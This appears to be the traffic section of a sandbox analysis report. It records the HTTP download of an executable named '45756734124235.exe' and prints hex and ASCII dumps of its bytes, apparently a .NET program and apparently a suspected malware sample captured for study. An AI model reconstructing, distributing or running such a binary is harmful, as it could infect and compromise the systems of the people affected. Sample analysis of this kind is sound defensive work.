                                                                                                                                                                                                  CF-Ray: 6b002e62d94e5c02-FRA
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Age: 245243
                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                  Content-Disposition: attachment;%20filename=45756734124235.exe
                                                                                                                                                                                                  ETag: "d9cafab0a71211867a38ece40d63c5b8"
                                                                                                                                                                                                  Expires: Fri, 18 Nov 2022 09:30:37 GMT
                                                                                                                                                                                                  Last-Modified: Mon, 15 Nov 2021 12:53:05 GMT
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                  x-goog-generation: 1636980785529378
                                                                                                                                                                                                  x-goog-hash: crc32c=eous1w==
                                                                                                                                                                                                  x-goog-hash: md5=2cr6sKcSEYZ6OOzkDWPFuA==
                                                                                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                  x-goog-stored-content-length: 106720
                                                                                                                                                                                                  X-GUploader-UploadID: ADPycdtJSC-JZ-drsT5wBXWvp34o8s0wi5DL_g3-zXhclv6N6EHyD3phtjR0TDfRxysiKFkA1u1GH4_BxmiahKzBCzQ
                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3224INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 39 6e 6a 36 79 46 4a 4a 58 79 55 64 6e 43 39 56 4d 68 61 59 49 56 79 30 46 72 36 34 47 69 41 67 73 69 63 44 41 63 31 62 72 58 5a 64 6f 6f 61 4c 38 66 35 74 51 53 44 57 30 4a 47 43 6d 67 48 43 4f 54 31 4f 76 37 75 77 49 47 68 54 52 46 5a 34 46 6d 50 46 4e 31 75 70 74 4d 69 46 56 6b 50 72 37 49 65 61 66 76 6e 58 6c 6d 63 31 34 5a 77 6f 5a 59 49 63 6e 53 44 6f 52 38 37 73 31 51 50 34 79 34 35 77 32 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9nj6yFJJXyUdnC9VMhaYIVy0Fr64GiAgsicDAc1brXZdooaL8f5tQSDW0JGCmgHCOT1Ov7uwIGhTRFZ4FmPFN1uptMiFVkPr7IeafvnXlmc14ZwoZYIcnSDoR87s1QP4y45w2w%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3224INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 3f 01 a9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 01 00 00 0c 00 00 00 00 00 00 0a 8f 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 0e a2 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL?0 @ @
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3225INData Raw: 01 00 70 72 b5 01 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 13 06 2b 38 09 72 bf 01 00 70 72 1b 02 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 6f 25 00 00 0a 2d 0e 11 04 7b f5 00 00 04 28 ed 00 00 06 2b 0c 11 04 7b f5 00 00 04 28 ec 00 00 06 13 06 11 06 28 26 00 00 0a 3a 32 01 00 00 11 06 16 6f 27 00 00 0a 13 08 12 08 28 28 00 00 0a 6f 29 00 00 0a 11 06 16 17 6f 2a 00 00 0a 28 2b 00 00 0a 13 06 11 04 7b f5 00 00 04 28 eb 00 00 06 13 07 11 07 28 26 00 00 0a 3a f2 00 00 00 11 05 11 06 6f 22 01 00 06 11 05 11 07 6f 24 01 00 06 11 05 11 04 fe 06 d8 01 00 06 73 2c 00 00 0a 7e f8 00 00 04 25 2d 17 26 7e f6 00 00 04 fe 06 df 01 00 06 73 2d 00 00 0a 25 80 f8 00 00 04 28 02 00 00 2b 6f 26 01 00 06 11 05 11 04 fe 06 d9 01 00 06 73 2e 00 00 0a 7e f9 00 00 04 25 2d 17 26 7e f6 00
                                                                                                                                                                                                  Data Ascii: prp~(+8rprp~(o%-{(+{((&:2o'((o)o*(+{((&:o"o$s,~%-&~s-%(+o&s.~%-&~
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3227INData Raw: 25 d0 bf 00 00 04 28 37 00 00 0a 73 38 00 00 0a 6f ad 00 00 06 6f 3b 00 00 0a 28 41 00 00 0a 20 40 42 0f 00 6a 5b 21 00 91 10 b6 02 00 00 00 59 6f 3a 01 00 06 11 07 11 04 11 05 1a 8d 5a 00 00 01 25 d0 e3 00 00 04 28 37 00 00 0a 73 38 00 00 0a 6f ad 00 00 06 6f 3b 00 00 0a 6f 3c 01 00 06 11 07 11 04 11 05 1f 0f 8d 5a 00 00 01 25 d0 a7 00 00 04 28 37 00 00 0a 73 38 00 00 0a 6f ad 00 00 06 08 28 06 00 00 06 6f 3e 01 00 06 11 07 13 06 11 06 6f 39 01 00 06 16 6a 2f 2a 11 06 28 42 00 00 0a 13 08 12 08 1f 0c 28 43 00 00 0a 13 08 12 08 28 44 00 00 0a 21 00 80 b5 f7 f5 7f 9f 08 59 6f 3a 01 00 06 de 03 26 de 00 11 06 2d 03 14 2b 07 11 06 28 3d 01 00 06 28 3c 00 00 0a 2d 08 06 11 06 6f 45 00 00 0a 11 05 17 58 13 05 11 05 11 04 6f ab 00 00 06 3f 31 fe ff ff de 03 26
                                                                                                                                                                                                  Data Ascii: %(7s8oo;(A @Bj[!Yo:Z%(7s8oo;o<Z%(7s8o(o>o9j/*(B(C(D!Yo:&-+(=(<-oEXo?1&
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3228INData Raw: 00 00 0a 0b 07 28 3a 00 00 0a 2d 68 09 17 58 0d 2b 94 09 18 33 39 72 c7 02 00 70 08 28 4f 00 00 0a 1f 0f 8d 5a 00 00 01 25 d0 c7 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 39 00 00 0a 0b 07 28 3a 00 00 0a 2d 2e 09 17 58 0d 38 57 ff ff ff 09 19 40 50 ff ff ff 02 1f 0f 8d 5a 00 00 01 25 d0 c7 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 39 00 00 0a 0b 07 28 3a 00 00 0a 2c 1b 07 28 ca 00 00 06 28 08 00 00 2b 6f d1 01 00 06 6f d4 01 00 06 0a de 03 26 de 00 de 03 26 de 00 06 2a 00 00 00 41 34 00 00 00 00 00 00 0b 01 00 00 18 00 00 00 23 01 00 00 03 00 00 00 0f 00 00 01 00 00 00 00 0c 00 00 00 1c 01 00 00 28 01 00 00 03 00 00 00 0a 00 00 01 13 30 02 00 27 00 00 00 08 00 00 11 17 0a 02 6f 50 00 00 0a 0b 2b 11 02 6f 50 00 00 0a 0b 06 17 58 0a 06 18 31 02 07 2a 03 07
                                                                                                                                                                                                  Data Ascii: (:-hX+39rp(OZ%(7s8(9(:-.X8W@PZ%(7s8(9(:,((+oo&&*A4#(0'oP+oPX1*
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3229INData Raw: 6f 0c 00 00 0a 3a c0 fe ff ff de 0a 07 2c 06 07 6f 0b 00 00 0a dc de 03 26 de 00 06 2a 00 00 00 41 64 00 00 02 00 00 00 7a 00 00 00 de 00 00 00 58 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 3d 00 00 00 2b 01 00 00 68 01 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 31 00 00 00 47 01 00 00 78 01 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 7e 01 00 00 84 01 00 00 03 00 00 00 0f 00 00 01 1b 30 06 00 c2 01 00 00 0d 00 00 11 73 3f 00 00 0a 0a 02 1f 0e 8d 5a 00 00 01 25 d0 b6 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 39 00 00 0a 0b 07 28 3a 00 00 0a 2d 07 06 0d dd 8d 01 00 00 07 73 ac 00 00 06 0c 08 1f 0b 8d 5a 00 00 01 25 d0 ec 00 00 04 28 37 00 00 0a 73 38 00 00 0a 6f af 00 00 06 26 16 13 04 38 4c 01 00 00 14 13 05 08 11 04 72 03 03 00 70 72 55 03 00
                                                                                                                                                                                                  Data Ascii: o:,o&*AdzX=+h1Gx~0s?Z%(7s8(9(:-sZ%(7s8o&8LrprU
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3231INData Raw: 00 00 0a 2d 24 11 0e 28 3c 00 00 0a 2d 1b 06 73 4e 01 00 06 25 11 0d 6f 4b 01 00 06 25 11 0e 6f 4d 01 00 06 6f 3e 00 00 0a de 03 26 de 00 11 06 17 58 13 06 11 06 11 05 8e 69 3f c3 fe ff ff 11 04 17 58 13 04 11 04 09 8e 69 3f a0 fe ff ff de 03 26 de 00 06 2a 08 2a 00 00 00 41 34 00 00 00 00 00 00 ae 00 00 00 22 01 00 00 d0 01 00 00 03 00 00 00 0a 00 00 01 00 00 00 00 06 00 00 00 f0 01 00 00 f6 01 00 00 03 00 00 00 0a 00 00 01 1e 02 28 62 00 00 0a 2a c2 02 28 62 00 00 0a 02 28 6d 00 00 0a 72 3d 04 00 70 72 87 04 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 28 39 00 00 0a 28 da 00 00 06 7d 01 00 00 04 2a 00 00 00 1b 30 01 00 10 00 00 00 00 00 00 00 02 28 1d 00 00 06 de 07 02 28 09 00 00 0a dc 2a 01 10 00 00 02 00 00 00 08 08 00 07 00 00 00 00 1e 02 7b 01 00 00 04 2a
                                                                                                                                                                                                  Data Ascii: -$(<-sN%oK%oMo>&Xi?Xi?&**A4"(b*(b(mr=prp~((9(}*0((*{*
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3232INData Raw: 06 73 71 00 00 0a 7a 07 2a 00 13 30 07 00 37 00 00 00 16 00 00 11 16 0a 02 03 04 14 16 12 00 16 28 1a 00 00 06 2c 06 73 71 00 00 0a 7a 06 8d 68 00 00 01 0b 02 03 04 07 07 8e 69 12 00 16 28 1a 00 00 06 2c 06 73 71 00 00 0a 7a 07 2a 00 13 30 05 00 69 00 00 00 17 00 00 11 16 0a 03 0d 16 13 04 2b 17 09 11 04 9a 13 05 11 05 2c 07 06 11 05 8e 69 58 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e2 06 17 59 17 58 8d 68 00 00 01 0b 16 0c 03 0d 16 13 04 2b 25 09 11 04 9a 13 06 11 06 2c 15 11 06 16 07 08 11 06 8e 69 28 78 00 00 0a 08 11 06 8e 69 58 0c 11 04 17 58 13 04 11 04 09 8e 69 32 d4 07 2a d2 28 60 00 00 0a 1f 0c 8d 5a 00 00 01 25 d0 ee 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 6e 00 00 0a 02 6f 70 00 00 0a 03 04 28 27 00 00 06 6f 61 00 00 0a 2a 00 00 1b 30 03 00 1d
                                                                                                                                                                                                  Data Ascii: sqz*07(,sqzhi(,sqz*0i+,iXXi2YXh+%,i(xiXXi2*(`Z%(7s8(nop('oa*0
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3233INData Raw: 11 02 7b 02 00 00 04 03 6f 09 01 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 02 00 00 04 03 6f 18 01 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 02 00 00 04 03 6f 0f 01 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 02 00 00 04 03 6f 0d 01 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 02 00 00 04 03 6f 10 01 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00
                                                                                                                                                                                                  Data Ascii: {o&*0{o&*0{o&*0{o&*0{o&*0
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3235INData Raw: 2b 2f 12 0b 28 a4 00 00 0a 13 0c 2b 18 06 6f 31 00 00 06 2d 06 73 a2 00 00 0a 7a 20 e8 03 00 00 28 a1 00 00 0a 06 11 05 11 0c 6f 48 00 00 06 2c dc 12 0b 28 a5 00 00 0a 2d c8 de 0e 12 0b fe 16 1d 00 00 1b 6f 0b 00 00 0a dc de 0a 06 2c 06 06 6f 0b 00 00 0a dc de 08 26 28 4c 00 00 06 de 00 2a 00 00 00 41 4c 00 00 02 00 00 00 70 01 00 00 3c 00 00 00 ac 01 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 42 00 00 00 7a 01 00 00 bc 01 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 01 00 00 c8 01 00 00 08 00 00 00 0f 00 00 01 be 72 93 09 00 70 80 04 00 00 04 72 e5 09 00 70 80 05 00 00 04 72 07 0a 00 70 80 06 00 00 04 72 09 0a 00 70 80 07 00 00 04 18 80 08 00 00 04 2a 13 30 05 00 b0 01 00 00 1e 00 00 11 02 28 8b 00 00 06 73 05 02 00 06 0a 1f 0f 8d 0e 00 00 02
                                                                                                                                                                                                  Data Ascii: +/(+o1-sz (oH,(-o,o&(L*ALp<Bzrprprprp*0(s
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3236INData Raw: 04 28 b3 00 00 0a 28 b4 00 00 0a 28 e1 00 00 06 28 5f 00 00 0a 28 28 00 00 06 72 eb 08 00 70 7e 1e 00 00 0a 6f 1f 00 00 0a 28 b4 01 00 06 2a 46 04 28 b5 00 00 0a 6f b6 00 00 0a 28 ce 01 00 06 2a 86 04 28 b7 00 00 0a 6f b8 00 00 0a 6f b9 00 00 0a 28 bc 01 00 06 04 28 e8 00 00 06 28 ba 01 00 06 2a 13 30 0c 00 96 00 00 00 00 00 00 00 04 7e 02 01 00 04 2d 24 16 d0 58 00 00 01 28 ba 00 00 0a d0 0c 00 00 02 28 ba 00 00 0a 28 bb 00 00 0a 28 bc 00 00 0a 80 02 01 00 04 7e 02 01 00 04 7b bd 00 00 0a 7e 02 01 00 04 7e 01 01 00 04 2d 30 16 72 3d 0a 00 70 14 d0 0c 00 00 02 28 ba 00 00 0a 17 8d 8d 00 00 01 25 16 16 14 28 be 00 00 0a a2 28 bf 00 00 0a 28 c0 00 00 0a 80 01 01 00 04 7e 01 01 00 04 7b c1 00 00 0a 7e 01 01 00 04 28 d4 00 00 06 6f c2 00 00 0a 6f c3 00 00 0a
                                                                                                                                                                                                  Data Ascii: ((((_((rp~o(*F(o(*(oo(((*0~-$X((((~{~~-0r=p(%(((~{~(oo
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3237INData Raw: 00 00 06 a2 25 17 14 fe 06 74 00 00 06 73 82 00 00 06 a2 25 18 14 fe 06 75 00 00 06 73 82 00 00 06 a2 25 19 14 fe 06 76 00 00 06 73 82 00 00 06 a2 25 1a 14 fe 06 77 00 00 06 73 82 00 00 06 a2 25 1b 14 fe 06 78 00 00 06 73 82 00 00 06 a2 25 1c 14 fe 06 7a 00 00 06 73 82 00 00 06 a2 25 1d 14 fe 06 7b 00 00 06 73 82 00 00 06 a2 25 1e 14 fe 06 7c 00 00 06 73 82 00 00 06 a2 25 1f 09 14 fe 06 7d 00 00 06 73 82 00 00 06 a2 25 1f 0a 14 fe 06 7e 00 00 06 73 82 00 00 06 a2 25 1f 0b 14 fe 06 7f 00 00 06 73 82 00 00 06 a2 25 1f 0c 14 fe 06 80 00 00 06 73 82 00 00 06 a2 25 1f 0d 14 fe 06 81 00 00 06 73 82 00 00 06 a2 25 1f 0e 14 fe 06 79 00 00 06 73 82 00 00 06 a2 28 87 00 00 06 1c 8d 0e 00 00 02 25 16 14 fe 06 72 00 00 06 73 82 00 00 06 a2 25 17 14 fe 06 70 00 00 06
                                                                                                                                                                                                  Data Ascii: %ts%us%vs%ws%xs%zs%{s%|s%}s%~s%s%s%s%ys(%rs%p
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3239INData Raw: 00 21 00 00 11 73 ac 00 00 0a 0a 28 de 00 00 06 6f c6 00 00 0a 0b 2b 0f 12 01 28 c7 00 00 0a 0c 06 08 6f c8 00 00 0a 12 01 28 c9 00 00 0a 2d e8 de 0e 12 01 fe 16 26 00 00 1b 6f 0b 00 00 0a dc 28 df 00 00 06 6f c6 00 00 0a 0b 2b 0f 12 01 28 c7 00 00 0a 0d 06 09 6f c8 00 00 0a 12 01 28 c9 00 00 0a 2d e8 de 0e 12 01 fe 16 26 00 00 1b 6f 0b 00 00 0a dc 06 73 96 01 00 06 13 04 11 04 1f 0c 8d 5a 00 00 01 25 d0 9e 00 00 04 28 37 00 00 0a 73 38 00 00 0a 6f 91 01 00 06 11 04 17 6f 95 01 00 06 11 04 28 e7 00 00 06 6f 93 01 00 06 11 04 6f c8 00 00 0a 04 28 bf 01 00 06 06 6f 78 01 00 06 2a 00 00 01 1c 00 00 02 00 11 00 1c 2d 00 0e 00 00 00 00 02 00 46 00 1c 62 00 0e 00 00 00 00 46 04 28 bf 01 00 06 28 e0 00 00 06 6f 7e 01 00 06 2a 46 04 28 bf 01 00 06 28 e5 00 00 06
                                                                                                                                                                                                  Data Ascii: !s(o+(o(-&o(o+(o(-&osZ%(7s8oo(oo(ox*-FbF((o~*F((
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3240INData Raw: f5 00 00 06 2d 03 16 2b 01 17 28 d1 00 00 0a 13 06 16 13 07 2b 56 11 06 11 07 9a 13 08 06 11 08 6f 24 00 00 0a 73 9f 01 00 06 25 09 11 05 11 08 6f fa 00 00 06 6f a7 01 00 06 25 09 6f f8 00 00 06 28 3c 00 00 0a 2d 08 09 6f f8 00 00 06 2b 07 11 05 6f ef 00 00 06 6f a9 01 00 06 6f d2 00 00 0a de 03 26 de 00 11 07 17 58 13 07 11 07 11 06 8e 69 32 a2 de 03 26 de 00 11 04 6f 0c 00 00 0a 3a 5c ff ff ff de 0c 11 04 2c 07 11 04 6f 0b 00 00 0a dc de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 26 ff ff ff de 03 26 de 00 06 2a 01 40 00 00 00 00 61 00 46 a7 00 03 0f 00 00 01 00 00 2e 00 8c ba 00 03 0a 00 00 01 02 00 20 00 ab cb 00 0c 00 00 00 00 00 00 13 00 c6 d9 00 03 0a 00 00 01 00 00 06 00 e5 eb 00 03 0a 00 00 01 1b 30 04 00 c4 01 00 00 28 00 00 11 73 a9 00 00 0a 0c 08
                                                                                                                                                                                                  Data Ascii: -+(+Vo$s%oo%o(<-o+ooo&Xi2&o:\,o&Xi?&&*@aF. 0(s
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3241INData Raw: 6a 2f 72 11 11 6f 23 00 00 0a 6f 24 00 00 0a 17 8d 58 00 00 01 25 16 18 8d 5a 00 00 01 25 16 1f 3a 9d 25 17 1f 5c 9d 73 38 00 00 0a a2 17 6f 4c 00 00 0a 13 12 06 11 11 6f 24 00 00 0a 73 9f 01 00 06 25 11 12 2c 07 11 12 8e 69 17 30 07 7e 1e 00 00 0a 2b 04 11 12 17 9a 6f a7 01 00 06 25 11 10 6f a3 01 00 06 6f d2 00 00 0a 07 11 11 6f d8 00 00 0a 58 0b de 03 26 de 00 11 0c 6f 0c 00 00 0a 3a 49 ff ff ff de 0c 11 0c 2c 07 11 0c 6f 0b 00 00 0a dc de 03 26 de 00 08 6f 0c 00 00 0a 3a 44 fd ff ff de 0a 08 2c 06 08 6f 0b 00 00 0a dc de 03 26 de 00 06 2a 41 c4 00 00 00 00 00 00 09 01 00 00 9f 00 00 00 a8 01 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 fb 00 00 00 be 00 00 00 b9 01 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 e4 00 00 00 e3 00 00 00 c7 01 00 00 03 00 00 00
                                                                                                                                                                                                  Data Ascii: j/ro#o$X%Z%:%\s8oLo$s%,i0~+o%oooX&o:I,o&o:D,o&*A
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3243INData Raw: 00 00 b0 01 00 00 03 00 00 00 0a 00 00 01 1e 02 28 fc 00 00 06 2a 13 30 06 00 85 00 00 00 00 00 00 00 02 03 25 2d 06 26 73 a9 00 00 0a 73 e1 00 00 0a 7d 0b 00 00 04 02 28 60 00 00 0a 20 8c 05 00 00 8d 5a 00 00 01 25 d0 e0 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 4b 00 00 0a 6f 61 00 00 0a 18 8d 58 00 00 01 25 16 72 69 0a 00 70 a2 25 17 28 e2 00 00 0a a2 17 6f 4c 00 00 0a 7e 07 01 00 04 25 2d 17 26 7e 06 01 00 04 fe 06 0d 02 00 06 73 e3 00 00 0a 25 80 07 01 00 04 28 17 00 00 2b 7d 0c 00 00 04 2a 1e 02 28 fc 00 00 06 2a 00 00 00 1b 30 03 00 65 00 00 00 2c 00 00 11 02 7b 0c 00 00 04 6f e4 00 00 0a 0a 2b 29 06 6f e5 00 00 0a 0b 04 6f 23 00 00 0a 6f 24 00 00 0a 12 01 28 e6 00 00 0a 6f 25 00 00 0a 2c 09 03 6f ef 00 00 06 0c de 2c 06 6f 0c 00 00 0a 2d cf de 0a
                                                                                                                                                                                                  Data Ascii: (*0%-&ss}(` Z%(7s8(KoaX%rip%(oL~%-&~s%(+}*(*0e,{o+)oo#o$(o%,o,o-
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3244INData Raw: 00 0a 73 38 00 00 0a 1f 09 8d 5a 00 00 01 25 d0 dc 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 e4 00 00 06 6f 20 00 00 0a 0c 38 25 01 00 00 12 02 28 21 00 00 0a 0d 06 73 f7 00 00 06 13 04 11 04 12 01 28 ea 00 00 0a 6f f0 00 00 06 11 04 17 8d 5a 00 00 01 25 16 1f 2a 9d 73 38 00 00 0a 6f f4 00 00 06 11 04 09 73 22 00 00 0a 28 23 00 00 0a 6f 24 00 00 0a 1c 8d 5a 00 00 01 25 d0 ac 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 2b 00 00 0a 6f f2 00 00 06 11 04 16 6f f6 00 00 06 11 04 6f e0 00 00 0a 09 73 22 00 00 0a 28 23 00 00 0a 6f 24 00 00 0a 1c 8d 5a 00 00 01 25 d0 ac 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 2b 00 00 0a 28 d4 00 00 0a 13 05 16 13 06 2b 67 11 05 11 06 9a 13 07 11 07 73 64 00 00 0a 6f 65 00 00 0a 6f 83 00 00 0a 1f 10 33 45 06 73 f7 00 00 06 13 04
                                                                                                                                                                                                  Data Ascii: s8Z%(7s8(o 8%(!s(oZ%*s8os"(#o$Z%(7s8(+ooos"(#o$Z%(7s8(+(+gsdoeo3Es
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3245INData Raw: 1e 02 28 fc 00 00 06 2a 1a 7e 1e 00 00 0a 2a 00 1b 30 08 00 a5 00 00 00 32 00 00 11 73 de 00 00 0a 0a 06 73 f7 00 00 06 0b 07 72 8f 0a 00 70 28 63 00 00 0a 72 07 0b 00 70 7e 1e 00 00 0a 6f 1f 00 00 0a 1f 24 8d 5a 00 00 01 25 d0 c8 00 00 04 28 37 00 00 0a 73 38 00 00 0a 72 1d 0b 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 72 c7 02 00 70 1e 8d 5a 00 00 01 25 d0 b0 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 5f 00 00 0a 28 39 00 00 0a 6f f2 00 00 06 07 72 2d 0b 00 70 28 18 00 00 2b 28 19 00 00 2b 73 38 00 00 0a 6f f4 00 00 06 07 16 6f f6 00 00 06 07 6f e0 00 00 0a de 03 26 de 00 06 2a 00 00 00 01 10 00 00 00 00 06 00 9a a0 00 03 0a 00 00 01 1e 02 28 fc 00 00 06 2a 1a 7e 1e 00 00 0a 2a 00 1b 30 07 00 80 00 00 00 33 00 00 11 73 de 00 00 0a 0a 06 73 f7 00 00 06 25 72 39
                                                                                                                                                                                                  Data Ascii: (*~*02ssrp(crp~o$Z%(7s8rp~(rpZ%(7s8(_(9or-p(+(+s8ooo&*(*~*03ss%r9
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3247INData Raw: 00 00 04 11 0a 11 0d 58 11 0e 16 96 58 69 11 0e 17 96 69 6f f2 00 00 0a 7d 26 00 00 04 02 7b 13 00 00 04 09 11 06 69 58 8f 2f 00 00 02 02 11 0a 11 0d 58 11 0e 16 96 58 11 0e 17 96 58 11 0e 18 96 58 69 11 0e 19 96 69 28 b2 00 00 06 7d 27 00 00 04 02 7b 0f 00 00 04 17 6a 33 60 02 7b 13 00 00 04 09 11 06 69 58 8f 2f 00 00 02 1f 0c 8d 5a 00 00 01 25 d0 ee 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 6e 00 00 0a 02 7b 10 00 00 04 11 0a 11 0d 58 11 0e 16 96 58 11 0e 17 96 58 11 0e 18 96 58 11 0e 19 96 58 69 11 0e 1a 96 69 6f f2 00 00 0a 7d 28 00 00 04 38 9e 00 00 00 02 7b 0f 00 00 04 18 6a 33 46 02 7b 13 00 00 04 09 11 06 69 58 8f 2f 00 00 02 28 75 00 00 0a 02 7b 10 00 00 04 11 0a 11 0d 58 11 0e 16 96 58 11 0e 17 96 58 11 0e 18 96 58 11 0e 19 96 58 69 11 0e 1a 96
                                                                                                                                                                                                  Data Ascii: XXiio}&{iX/XXXXii(}'{j3`{iX/Z%(7s8(n{XXXXXiio}(8{j3F{iX/(u{XXXXXi
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3248INData Raw: 06 11 09 58 11 0e 6a 58 69 11 0a 11 0f 8f 2e 00 00 02 7b 24 00 00 04 69 6f f2 00 00 0a a2 38 31 01 00 00 02 7b 0f 00 00 04 18 6a 33 44 02 7b 14 00 00 04 07 08 58 8f 30 00 00 02 7b 29 00 00 04 11 0f 28 75 00 00 0a 02 7b 10 00 00 04 11 06 11 09 58 11 0e 6a 58 69 11 0a 11 0f 8f 2e 00 00 02 7b 24 00 00 04 69 6f f2 00 00 0a a2 38 e3 00 00 00 02 7b 0f 00 00 04 19 6a 40 d6 00 00 00 02 7b 14 00 00 04 07 08 58 8f 30 00 00 02 7b 29 00 00 04 11 0f 28 f3 00 00 0a 02 7b 10 00 00 04 11 06 11 09 58 11 0e 6a 58 69 11 0a 11 0f 8f 2e 00 00 02 7b 24 00 00 04 69 6f f2 00 00 0a a2 38 92 00 00 00 02 7b 14 00 00 04 07 08 58 8f 30 00 00 02 7b 29 00 00 04 11 0f 1f 0c 8d 5a 00 00 01 25 d0 ee 00 00 04 28 37 00 00 0a 73 38 00 00 0a 28 6e 00 00 0a 02 7b 10 00 00 04 11 06 11 09 58 11
                                                                                                                                                                                                  Data Ascii: XjXi.{$io81{j3D{X0{)(u{XjXi.{$io8{j@{X0{)({XjXi.{$io8{X0{)Z%(7s8(n{X
